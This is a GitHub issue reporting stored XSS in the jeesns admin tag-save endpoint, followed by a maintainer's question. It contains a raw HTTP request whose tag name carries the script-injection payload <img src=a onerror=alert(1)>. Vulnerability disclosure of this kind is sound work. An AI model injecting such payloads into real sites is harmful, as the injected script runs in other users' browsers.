### ISSUE TITLE
存储XSS

### ISSUE THREAD

**Issue by hackping** [zchuanzhao/jeesns#2]
POST /jeesns/manage/tag/save HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/jeesns/manage/tag/add/7
Content-Length: 17
Cookie: *
DNT: 1
Connection: close

name=a<img src=a onerror=alert(1)>&funcType=7

**Comment by zchuanzhao** [comment]
请问是什么问题呢
